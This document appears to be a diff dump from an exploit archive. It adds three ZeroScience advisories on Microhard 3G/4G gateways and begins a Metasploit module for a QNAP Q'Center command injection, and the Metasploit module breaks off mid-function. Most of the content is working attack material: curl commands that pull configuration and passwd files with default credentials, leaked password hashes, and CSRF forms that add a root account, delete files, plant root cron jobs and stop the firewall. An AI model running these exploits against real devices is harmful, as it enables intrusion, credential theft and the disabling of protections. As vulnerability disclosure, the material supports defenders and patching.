crontab eurd httpd localmonitord network snmpd twatchdog webiffirewalllog
custom-user-startup firewall ioports logtrigger ntpclient soip umount websockserverd
datausemonitord force_reboot iperf lte ntrd soip2 updatedd wsClient
defconfig ftpd ipsec lteshutdown nxl2tpd-wan soip2.getty usb xl2tpd
dhcp_client gpsd ipsec_vpn media_ctrl pimd soipd1 vcad xl2tpd-wan
Stop the HTTPd:
GET http://192.168.1.1/cgi-bin/webif/system-services.sh?service=httpd&action=stop HTTP/1.1

144
exploits/hardware/webapps/45036.txt Normal file
View file

@ -0,0 +1,144 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: The system backup configuration file 'IPn4G.config' in '/' directory or its respective
name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp'
and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain
circumstances. This will enable the attacker to disclose sensitive information and help her
in authentication bypass, privilege escalation and/or full system access.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5484
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php
13.03.2018
--
/etc/m_cli/cli.conf:
--------------------
curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc/m_cli&savefile=cli.conf" -H "Authorization: Basic YWRtaW46YWRtaW4=" |grep passwd
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2719 100 2719 0 0 2574 0 0:00:01 0:00:01 --:--:-- 2577
passwd admin
/www/IPn4G.config:
------------------
lqwrm@metalgear:~$ curl http://192.168.1.1/IPn4G.config -o IPn4G.tar.gz -H "Authorization: Basic YWRtaW46YWRtaW4="
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 13156 100 13156 0 0 9510 0 0:00:01 0:00:01 --:--:-- 9512
lqwrm@metalgear:~$ tar -zxf IPn4G.tar.gz ; ls
config.boardinfo config.boardtype config.date config.name etc IPn4G.tar.gz usr
lqwrm@metalgear:~$ cat config.boardinfo config.boardtype config.date config.name
2012 Microhard Systems Inc.:IPn4Gb-IPn4G:v1.0.0
Atheros AR7130 rev 2
Thu Jul 12 12:42:42 PDT 2018
IPn4G
lqwrm@metalgear:~$ cat usr/lib/hardware_desc
modem_type="N930"
LTE_ATCOMMAND_PORT="/dev/ttyACM0"
LTE_DIAG_PORT=""
LTE_GPS_PORT=""
wificard = "0"
lqwrm@metalgear:~$ ls etc/
config crontabs dropbear ethers firewall.user hosts httpd.conf passwd ssl
lqwrm@metalgear:~$ ls etc/config/
comport dhcp gpsgatetr iperf modbusd notes sdpServer twatchdog webif_access_control
comport2 dropbear gpsr ipsec msmscomd ntpclient snmpd updatedd websockserver
coova-chilli ethernet gpsrecorderd keepalive msshc ntrd snmpd.conf vlan wireless
cron eurd gre-tunnels localmonitor network pimd system vnstat wsclient
crontabs firewall httpd lte network_IPnVTn3G ping timezone vpnc
datausemonitor gpsd ioports lte362 network_VIP4G salertd tmpstatus webif
lqwrm@metalgear:~$ cat etc/passwd
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
nobody:*:65534:65534:nobody:/var:/bin/false
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
/www/cgi-bin/system.conf:
-------------------------
lqwrm@metalgear:~$ curl -O http://192.168.1.1/cgi-bin/system.conf -H "Authorization: Basic YWRtaW46YWRtaW4="
lqwrm@metalgear:~$ cat system.conf |grep -irnH "password" -A2
system.conf:236:#VPN Admin Password:
system.conf-237-NetWork_IP_VPN_Passwd=admin
system.conf-238-
--
system.conf:309:#V3 Authentication Password:
system.conf:310:NetWork_SNMP_V3_Auth_Password=00000000
system.conf-311-
system.conf:312:#V3 Privacy Password:
system.conf:313:NetWork_SNMP_V3_Privacy_Password=00000000
Login to FTP (upgrade:admin). In /tmp/ or /tmp/upgrade/ the system.conf (gzipped) is located.
---------------------------------------------------------------------------------------------

139
exploits/hardware/webapps/45037.txt Normal file
View file

@ -0,0 +1,139 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: Due to the hidden and undocumented File Editor (Filesystem Browser) shell script
'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary
files on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET
and POST parameters is not properly sanitized before being used to modify files. This can
be exploited by an authenticated attacker to read or modify arbitrary files on the affected
system.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5485
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php
13.03.2018
--
Download (script):
------------------
# curl "http://192.168.1.1/cgi-bin/webif/download.sh?script=/cgi-bin/webif/system-editor.sh&path=/etc&savefile=passwd" -H "Authorization: Basic YWRtaW46YWRtaW4="
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
admin:$1$0VKXa1iD$.Jw20V3iH3kx6VSLjsFZP.:0:0:admin:/:/etc/m_cli/m_cli.sh
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
nobody:*:65534:65534:nobody:/var:/bin/false
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
testingus:$1$S9c8yiFq$P96OckXNQMhpKjFoRx1sL.:1000:1000:Linux User,,,:/home/testingus:/bin/false
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
Edit (edit):
------------
CSRF add roOt:rewt to htpasswd:
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-editor.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="path" value="/etc" />
<input type="hidden" name="edit" value="htpasswd" />
<input type="hidden" name="filecontent" value="root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/
admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
<input type="hidden" name="save" value=" Save Changes " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Delete (delfile):
-----------------
GET /cgi-bin/webif/system-editor.sh?path=/www&delfile=pwn.txt HTTP/1.1
Or edit and remove sanitization:
File: /usr/lib/webif/sanitize.awk
// { _str=$0;
gsub(/ /,"",_str)
gsub(/\|/,"",_str)
gsub(/\\/,"",_str)
gsub(/&/,"",_str)
gsub(/\^/,"",_str)
gsub(/\$/,"",_str)
gsub(/'/,"",_str)
gsub(/"/,"",_str)
gsub(/`/,"",_str)
gsub(/\{/,"",_str)
gsub(/\}/,"",_str)
gsub(/\(/,"",_str)
gsub(/\)/,"",_str)
gsub(/;/,"",_str)
print _str
}

287
exploits/hardware/webapps/45038.txt Normal file
View file

@ -0,0 +1,287 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Remote Root Exploit
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: The application suffers from multiple authenticated arbitrary remote code execution
vulnerabilities with highest privileges. This is due to multiple hidden and undocumented
features within the admin interface that allows an attacker to create crontab jobs and/or
modify the system startup script that allows execution of arbitrary code as root user.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5479
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php
13.03.2018
--
Crontab #1:
-----------
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="submit" value="1" />
<input type="hidden" name="sltMinutes" value="" />
<input type="hidden" name="sltHours" value="" />
<input type="hidden" name="sltDays" value="" />
<input type="hidden" name="sltMonths" value="" />
<input type="hidden" name="sltDaysOfWeek" value="" />
<input type="hidden" name="txthMinutes" value="" />
<input type="hidden" name="txthHours" value="" />
<input type="hidden" name="txthDays" value="" />
<input type="hidden" name="txthMonths" value="" />
<input type="hidden" name="txthDaysOfWeek" value="" />
<input type="hidden" name="ddEveryXminute" value="" />
<input type="hidden" name="ddEveryXhour" value="" />
<input type="hidden" name="ddEveryXday" value="" />
<input type="hidden" name="txtCommand" value="" />
<input type="hidden" name="txthCronEnabled" value="0" />
<input type="hidden" name="txtCrontabEntry" value="" />
<input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
<input type="hidden" name="HOURS_cfg02e2c8" value="*" />
<input type="hidden" name="DAYS_cfg02e2c8" value="*" />
<input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
<input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
<input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
<input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
<input type="hidden" name="MINUTES_cfg04b4e9" value="*" />
<input type="hidden" name="HOURS_cfg04b4e9" value="*" />
<input type="hidden" name="DAYS_cfg04b4e9" value="*" />
<input type="hidden" name="MONTHS_cfg04b4e9" value="*" />
<input type="hidden" name="WEEKDAYS_cfg04b4e9" value="*" />
<input type="hidden" name="COMMAND_cfg04b4e9" value="id > /www/pwn.txt" />
<input type="hidden" name="ENABLED_cfg04b4e9" value="1" />
<input type="hidden" name="MINUTES_newCron" value="" />
<input type="hidden" name="HOURS_newCron" value="" />
<input type="hidden" name="DAYS_newCron" value="" />
<input type="hidden" name="MONTHS_newCron" value="" />
<input type="hidden" name="WEEKDAYS_newCron" value="" />
<input type="hidden" name="COMMAND_newCron" value="" />
<input type="hidden" name="ENABLED_newCron" value="" />
<input type="hidden" name="action" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
curl http://192.168.1.1/pwn.txt
uid=0(root) gid=0(root) groups=0(root)
Start ftpd:
-----------
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-startup.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="path" value="/etc/init.d" />
<input type="hidden" name="edit" value="custom-user-startup" />
<input type="hidden" name="filecontent" value="#!/bin/sh /etc/rc.common
START=90
# place your own startup commands here
#
# REMEMBER: You *MUST* place an '&' after launching programs you
# that are to continue running in the background.
#
# i.e.
# BAD: upnpd
# GOOD: upnpd &
#
# Failure to do this will result in the startup process halting
# on this file and the diagnostic light remaining on (at least
# for WRT54G(s) models).
#
ftpd &
" />
<input type="hidden" name="save" value=" Save Changes " />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Crontab #2:
-----------
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="submit" value="1" />
<input type="hidden" name="sltMinutes" value="" />
<input type="hidden" name="sltHours" value="" />
<input type="hidden" name="sltDays" value="" />
<input type="hidden" name="sltMonths" value="" />
<input type="hidden" name="sltDaysOfWeek" value="" />
<input type="hidden" name="txthMinutes" value="*" />
<input type="hidden" name="txthHours" value="*" />
<input type="hidden" name="txthDays" value="*" />
<input type="hidden" name="txthMonths" value="*" />
<input type="hidden" name="txthDaysOfWeek" value="*" />
<input type="hidden" name="ddEveryXminute" value="" />
<input type="hidden" name="ddEveryXhour" value="" />
<input type="hidden" name="ddEveryXday" value="" />
<input type="hidden" name="txtCommand" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
<input type="hidden" name="chkCronEnabled" value="on" />
<input type="hidden" name="txthCronEnabled" value="1" />
<input type="hidden" name="txtCrontabEntry" value="* * * * * uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
<input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
<input type="hidden" name="HOURS_cfg02e2c8" value="*" />
<input type="hidden" name="DAYS_cfg02e2c8" value="*" />
<input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
<input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
<input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
<input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
<input type="hidden" name="MINUTES_cfg0421ec" value="*" />
<input type="hidden" name="HOURS_cfg0421ec" value="*" />
<input type="hidden" name="DAYS_cfg0421ec" value="*" />
<input type="hidden" name="MONTHS_cfg0421ec" value="*" />
<input type="hidden" name="WEEKDAYS_cfg0421ec" value="*" />
<input type="hidden" name="COMMAND_cfg0421ec" value="uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt" />
<input type="hidden" name="ENABLED_cfg0421ec" value="1" />
<input type="hidden" name="MINUTES_newCron" value="" />
<input type="hidden" name="HOURS_newCron" value="" />
<input type="hidden" name="DAYS_newCron" value="" />
<input type="hidden" name="MONTHS_newCron" value="" />
<input type="hidden" name="WEEKDAYS_newCron" value="" />
<input type="hidden" name="COMMAND_newCron" value="" />
<input type="hidden" name="ENABLED_newCron" value="" />
<input type="hidden" name="action" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
---
curl http://192.168.1.1/os.txt
Linux IPn4G 2.6.32.9 #1 Mon Jun 20 15:28:30 MDT 2016 mips GNU/Linux
drwxr-xr-x 5 root root 0 Jul 1 14:01 .
drwxr-xr-x 7 root root 0 Dec 31 1969 ..
-rw-r--r-- 1 root root 4 Apr 12 2010 .version
-rw-r--r-- 1 root root 13461 May 8 15:54 IPn4G.config
drwxr-xr-x 3 root root 0 Jun 20 2016 cgi-bin
-rw-r--r-- 1 root root 2672 Apr 1 2010 colorize.js
-rwxr-xr-x 1 root root 3638 May 10 2010 favicon.ico
drwxr-xr-x 2 root root 959 Jun 20 2016 images
-rw-r--r-- 1 root root 600 Feb 12 2013 index.html
drwxr-xr-x 2 root root 224 Jun 20 2016 js
-rw-r--r-- 1 root root 68 Mar 1 14:09 os.txt
drwxr-xr-x 2 root root 79 Jun 20 2016 svggraph
drwxr-xr-x 2 root root 0 Jul 1 14:02 themes
drwxr-xr-x 2 root root 0 May 8 16:21 vnstat
-rw-r--r-- 1 root root 953 Apr 1 2010 webif.js
uid=0(root) gid=0(root) groups=0(root)
Disable firewall:
-----------------
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-crontabs.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="submit" value="1" />
<input type="hidden" name="sltMinutes" value="" />
<input type="hidden" name="sltHours" value="" />
<input type="hidden" name="sltDays" value="" />
<input type="hidden" name="sltMonths" value="" />
<input type="hidden" name="sltDaysOfWeek" value="" />
<input type="hidden" name="txthMinutes" value="*" />
<input type="hidden" name="txthHours" value="*" />
<input type="hidden" name="txthDays" value="*" />
<input type="hidden" name="txthMonths" value="*" />
<input type="hidden" name="txthDaysOfWeek" value="*" />
<input type="hidden" name="ddEveryXminute" value="" />
<input type="hidden" name="ddEveryXhour" value="" />
<input type="hidden" name="ddEveryXday" value="" />
<input type="hidden" name="txtCommand" value="/etc/init.d/firewall stop" />
<input type="hidden" name="chkCronEnabled" value="on" />
<input type="hidden" name="txthCronEnabled" value="1" />
<input type="hidden" name="txtCrontabEntry" value="* * * * * /etc/init.d/firewall stop" />
<input type="hidden" name="MINUTES_cfg02e2c8" value="*/3" />
<input type="hidden" name="HOURS_cfg02e2c8" value="*" />
<input type="hidden" name="DAYS_cfg02e2c8" value="*" />
<input type="hidden" name="MONTHS_cfg02e2c8" value="*" />
<input type="hidden" name="WEEKDAYS_cfg02e2c8" value="*" />
<input type="hidden" name="COMMAND_cfg02e2c8" value="/etc/init.d/ntpclient start" />
<input type="hidden" name="ENABLED_cfg02e2c8" value="1" />
<input type="hidden" name="MINUTES_cfg04f65b" value="*" />
<input type="hidden" name="HOURS_cfg04f65b" value="*" />
<input type="hidden" name="DAYS_cfg04f65b" value="*" />
<input type="hidden" name="MONTHS_cfg04f65b" value="*" />
<input type="hidden" name="WEEKDAYS_cfg04f65b" value="*" />
<input type="hidden" name="COMMAND_cfg04f65b" value="/etc/init.d/firewall stop" />
<input type="hidden" name="ENABLED_cfg04f65b" value="1" />
<input type="hidden" name="MINUTES_newCron" value="" />
<input type="hidden" name="HOURS_newCron" value="" />
<input type="hidden" name="DAYS_newCron" value="" />
<input type="hidden" name="MONTHS_newCron" value="" />
<input type="hidden" name="WEEKDAYS_newCron" value="" />
<input type="hidden" name="COMMAND_newCron" value="" />
<input type="hidden" name="ENABLED_newCron" value="" />
<input type="hidden" name="action" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

198
exploits/linux/remote/45043.rb Executable file
View file

@ -0,0 +1,198 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => "QNAP Q'Center change_passwd Command Execution",
'Description' => %q{
This module exploits a command injection vulnerability in the
`change_passwd` API method within the web interface of QNAP Q'Center
virtual appliance versions prior to 1.7.1083.
The vulnerability allows the 'admin' privileged user account to
execute arbitrary commands as the 'admin' operating system user.
Valid credentials for the 'admin' user account are required, however,
this module also exploits a separate password disclosure issue which
allows any authenticated user to view the password set for the 'admin'
user during first install.
This module has been tested successfully on QNAP Q'Center appliance
version 1.6.1075.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ivan Huertas', # Discovery and PoC
'Brendan Coles' # Metasploit
],
'References' =>
[
['CVE', '2018-0706'], # privesc
['CVE', '2018-0707'], # rce
['EDB', '45015'],
['URL', 'https://www.coresecurity.com/advisories/qnap-qcenter-virtual-appliance-multiple-vulnerabilities'],
['URL', 'http://seclists.org/fulldisclosure/2018/Jul/45'],
['URL', 'https://www.securityfocus.com/archive/1/542141'],
['URL', 'https://www.qnap.com/en-us/security-advisory/nas-201807-10']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Auto', { }]],
'CmdStagerFlavor' => %w[printf bourne wget],
'Privileged' => false,
'DisclosureDate' => 'Jul 11 2018',
'DefaultOptions' => {'RPORT' => 443, 'SSL' => true},
'DefaultTarget' => 0))
register_options [
OptString.new('TARGETURI', [true, "Base path to Q'Center", '/qcenter/']),
OptString.new('USERNAME', [true, 'Username for the application', 'admin']),
OptString.new('PASSWORD', [true, 'Password for the application', 'admin'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def check
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.html')
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
unless res.code == 200 && res.body.include?("<title>Q'center</title>")
vprint_error "Target is not a QNAP Q'Center appliance"
return CheckCode::Safe
end
version = res.body.scan(/\.js\?_v=([\d\.]+)/).flatten.first
if version.to_s.eql? ''
vprint_error "Could not determine QNAP Q'Center appliance version"
return CheckCode::Detected
end
version = Gem::Version.new version
vprint_status "Target is QNAP Q'Center appliance version #{version}"
if version >= Gem::Version.new('1.7.1083')
return CheckCode::Safe
end
CheckCode::Appears
end
def login(user, pass)
vars_post = {
name: user,
password: Rex::Text.encode_base64(pass),
remember: 'false'
}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/hawkeye/v1/login'),
'ctype' => 'application/json',
'data' => vars_post.to_json
})
if res.nil?
fail_with Failure::Unreachable, 'Connection failed'
elsif res.code == 200 && res.body.eql?('{}')
print_good "Authenticated as user '#{user}' successfully"
elsif res.code == 401 || res.body.include?('AuthException')
fail_with Failure::NoAccess, "Invalid credentials for user '#{user}'"
else
fail_with Failure::UnexpectedReply, "Unexpected reply [#{res.code}]"
end
@cookie = res.get_cookies
if @cookie.nil?
fail_with Failure::UnexpectedReply, 'Failed to retrieve cookie'
end
end
#
# Retrieve list of user accounts
#
def account
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/hawkeye/v1/account'),
'cookie' => @cookie
})
JSON.parse(res.body)['account']
rescue
print_error 'Could not retrieve list of users'
nil
end
#
# Login to the 'admin' privileged user account
#
def privesc
print_status 'Retrieving admin user details ...'
admin = account.first
if admin.blank? || admin['_id'].blank? || admin['name'].blank? || admin['new_password'].blank?
fail_with Failure::UnexpectedReply, 'Failed to retrieve admin user details'
end
@id = admin['_id']
@pw = Rex::Text.decode_base64 admin['new_password']
print_good "Found admin password used during install: #{@pw}"
login admin['name'], @pw
end
#
# Change password to +new+ for user with ID +id+
#
def change_passwd(id, old, new)
vars_post = {
_id: id,
old_password: Rex::Text.encode_base64(old),
new_password: Rex::Text.encode_base64(new),
}
send_request_cgi({
'method' => 'POST',
